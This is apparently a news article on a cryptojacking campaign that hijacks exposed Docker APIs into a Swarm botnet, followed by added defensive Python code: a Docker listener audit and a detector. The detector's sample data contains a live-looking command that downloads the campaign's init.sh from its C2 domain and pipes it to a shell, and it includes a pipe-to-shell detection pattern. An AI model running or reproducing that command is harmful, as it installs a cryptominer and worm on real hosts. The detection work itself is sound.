Cybersecurity researchers have uncovered a new cryptojacking campaign targeting the Docker Engine API with the goal of co-opting the instances to join a malicious Docker Swarm controlled by the threat actor.

This enabled the attackers to "use Docker Swarm's orchestration features for command-and-control (C2) purposes," Datadog researchers Matt Muir and Andy Giron said in an analysis. "This allows the threat actor to expand their control over multiple Docker instances in a coordinated fashion, effectively turning compromised systems into a botnet for further exploitation," the researchers said.

The attacks leverage Docker for initial access to deploy a cryptocurrency miner on compromised containers, while also fetching and executing additional payloads that are responsible for conducting lateral movement to related hosts running Docker, Kubernetes, or SSH. Specifically, this involves identifying unauthenticated and exposed Docker API endpoints using Internet scanning tools, such as masscan and ZGrab.

On vulnerable endpoints, the Docker API is used to spawn an Alpine container and then retrieve an initialization shell script (init.sh) from a remote server ("solscan[.]live") that, in turn, checks if it's running as the root user and tools like curl and wget are installed before downloading the XMRig miner. The shell script is also designed to fetch three other shell scripts – kube.lateral.sh, spread_docker_local.sh, and spread_ssh.sh – from the same server for lateral movement to Docker, Kubernetes, and SSH endpoints on the network.

The upspin image is designed to execute the aforementioned init.sh script, thus allowing the group's malware to propagate in a worm-like fashion to other Docker hosts. What's more, the Docker image tag that's used to retrieve the image from Docker Hub is specified in a text file hosted on the C2 server, thereby allowing the threat actors to easily recover from potential takedowns by simply changing the file contents to point to a different container image.

The third shell script, spread_ssh.sh, is capable of compromising SSH servers, as well as adding an SSH key and a new user named ftp that enables the threat actors to remotely connect to the hosts and maintain persistent access. In the final stage, both the Kubernetes and SSH lateral movement payloads execute another shell script called setup_mr.sh that retrieves and launches the cryptocurrency miner.

"This campaign demonstrates that services such as Docker and Kubernetes remain fruitful for threat actors conducting cryptojacking at scale," Datadog said.

The development comes as Elastic Security Labs shed light on a sophisticated Linux malware campaign targeting vulnerable Apache servers to establish persistence via GSocket and deploy malware families such as Kaiji and RUDEDEVIL (aka Lucifer) that facilitate distributed denial-of-service (DDoS) and cryptocurrency mining, respectively. "The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels," researchers Remco Sprooten and Ruben Groenewoud said.
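The campaign's entry point is a Docker Engine API reachable over TCP with no client authentication. The following audit script is an added example, not code from the article or from Datadog's research: it reads the two places dockerd takes its listen addresses from (the `hosts` key in `/etc/docker/daemon.json` and `-H`/`--host` flags on the dockerd command line) and flags any `tcp://` listener that lacks `--tlsverify`, with the worst rating for a bind to all interfaces. The daemon configurations it checks are constructed samples; a real deployment would read the live `daemon.json` and the systemd `ExecStart` line.

```python
"""Audit a Docker daemon's listener configuration for unauthenticated TCP exposure.

Added example, not code from the article or from Datadog's research. dockerd takes
its listen addresses from the "hosts" key of /etc/docker/daemon.json or from
-H/--host flags on its command line (it refuses to start if both are set), so the
audit accepts both sources. The sample configurations below are constructed.
"""
import json
import re
from dataclasses import dataclass
from shlex import split as shell_split
from urllib.parse import urlsplit

# Hostnames that mean "every interface" for a tcp:// listener.
WILDCARD_HOSTS = {"", "0.0.0.0", "::"}


@dataclass
class Finding:
    listener: str
    severity: str
    reason: str


def parse_dockerd_cmdline(cmdline: str) -> tuple[list[str], bool]:
    """Return (-H/--host values, whether --tlsverify is set) from a dockerd command line."""
    args = shell_split(cmdline)
    hosts: list[str] = []
    tls_verify = False
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        match = re.match(r"^(?:-H|--host)=(.+)$", arg)
        if match:
            hosts.append(match.group(1))
        elif arg == "--tlsverify" or (
            arg.startswith("--tlsverify=") and arg.split("=", 1)[1].lower() != "false"
        ):
            tls_verify = True
        i += 1
    return hosts, tls_verify


def audit_listeners(daemon_json: str, cmdline: str) -> list[Finding]:
    """Flag tcp:// listeners that accept unauthenticated clients or bind every interface."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    cli_hosts, cli_tls = parse_dockerd_cmdline(cmdline)
    listeners = list(cfg.get("hosts", [])) + cli_hosts
    tls_verify = bool(cfg.get("tlsverify", False)) or cli_tls

    findings: list[Finding] = []
    for listener in listeners:
        parts = urlsplit(listener)
        if parts.scheme != "tcp":
            continue  # unix:// and fd:// sockets are reachable only from the host itself
        wildcard = (parts.hostname or "") in WILDCARD_HOSTS
        if not tls_verify:
            # Without --tlsverify the API has no authentication: any client that can reach
            # the port can create containers or join the node to a swarm. Binding every
            # interface is the shape Internet scanners find.
            findings.append(Finding(listener, "critical" if wildcard else "high",
                                    "TCP listener without TLS client-certificate verification"))
        elif wildcard:
            findings.append(Finding(listener, "medium",
                                    "TLS-protected but bound to all interfaces; bind to a "
                                    "management address or firewall the port"))
    return findings


# Constructed samples: the weak shape the campaign looks for, and a hardened one.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""
DEFAULT_CMDLINE = "/usr/bin/dockerd"


def main() -> None:
    for label, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        findings = audit_listeners(cfg, DEFAULT_CMDLINE)
        print(f"{label}: {len(findings)} finding(s)")
        for f in findings:
            print(f"  [{f.severity}] {f.listener}: {f.reason}")


if __name__ == "__main__":
    main()
```

The hardened sample keeps the API on a single management address and requires client certificates; a TCP listener is not needed at all on most hosts, in which case the right fix is to drop it and use the Unix socket only.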
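Two observables from the chain above are cheap to check on a Docker host: a container whose command fetches a remote shell script with curl or wget and pipes it to a shell (how init.sh is retrieved), and a daemon that has unexpectedly become an active Swarm member (the C2 mechanism). The detector below is an added example, not code from the article or from Datadog's research. It consumes the JSON that `docker inspect` and `docker info --format '{{json .}}'` emit; the only indicator taken from the article is the `solscan[.]live` domain, and every container and daemon record it runs over is a constructed sample.

```python
"""Flag containers and swarm state matching the campaign pattern described above.

Added example, not code from the article or from Datadog's research. Input is the
JSON emitted by `docker inspect <ids>` and `docker info --format '{{json .}}'`.
The watchlist domain is the one reported in the article; all records below are
constructed samples.
"""
import json
import re


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'solscan[.]live' back into a matchable string."""
    return indicator.replace("[.]", ".")


# Kept defanged here, as in the article, and refanged only for matching.
WATCHLIST_DOMAINS = {refang("solscan[.]live")}

# Download-and-execute: curl/wget output piped straight into sh or bash.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")
URL_HOST = re.compile(r"https?://([^/\s:'\"]+)")


def _flatten_command(config: dict) -> str:
    """Join Entrypoint and Cmd into one string, as the container would run it."""
    parts = (config.get("Entrypoint") or []) + (config.get("Cmd") or [])
    return " ".join(parts)


def suspicious_containers(inspect_json: str) -> list[dict]:
    """Return one alert per container whose command matches the download-and-run pattern
    or contacts a watchlisted domain."""
    alerts = []
    for record in json.loads(inspect_json):
        config = record.get("Config", {})
        command = _flatten_command(config)
        reasons = []
        if PIPE_TO_SHELL.search(command):
            reasons.append("command downloads a remote script and pipes it to a shell")
        hits = {h.lower() for h in URL_HOST.findall(command)} & WATCHLIST_DOMAINS
        if hits:
            reasons.append("command contacts watchlisted domain(s): " + ", ".join(sorted(hits)))
        if reasons:
            alerts.append({
                "id": record.get("Id", "")[:12],
                "name": record.get("Name", "").lstrip("/"),
                "image": config.get("Image", ""),
                "reasons": reasons,
            })
    return alerts


def unexpected_swarm_membership(info_json: str, swarm_expected: bool = False) -> bool:
    """True when `docker info` reports an active swarm node on a host that should not be one."""
    state = json.loads(info_json).get("Swarm", {}).get("LocalNodeState", "inactive")
    return state == "active" and not swarm_expected


# Constructed samples: one container shaped like the article's Alpine stager, one benign.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "7a3f2c9e1b4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f",
        "Name": "/quirky_turing",
        "Config": {
            "Image": "alpine:latest",
            "Entrypoint": None,
            "Cmd": ["sh", "-c", f"wget -qO- http://{refang('solscan[.]live')}/init.sh | sh"],
        },
    },
    {
        "Id": "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
        "Name": "/web",
        "Config": {
            "Image": "nginx:1.27",
            "Entrypoint": ["/docker-entrypoint.sh"],
            "Cmd": ["nginx", "-g", "daemon off;"],
        },
    },
])
SAMPLE_INFO = json.dumps({"Swarm": {"NodeID": "constructed-node-id", "LocalNodeState": "active"}})


if __name__ == "__main__":
    for alert in suspicious_containers(SAMPLE_INSPECT):
        print(f"{alert['id']} {alert['name']} ({alert['image']}): {'; '.join(alert['reasons'])}")
    if unexpected_swarm_membership(SAMPLE_INFO):
        print("host is an active Swarm node but is not expected to be one")
```

The swarm check is only meaningful with an inventory of hosts that legitimately run Swarm, which is why `swarm_expected` is a parameter rather than a constant; the download-and-run pattern is generic to living-off-the-land stagers and will also surface legitimate install scripts, so it belongs in triage rather than blocking.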
This article was published on thehackernews.com. Publication date: Tue, 01 Oct 2024 05:43:37 +0000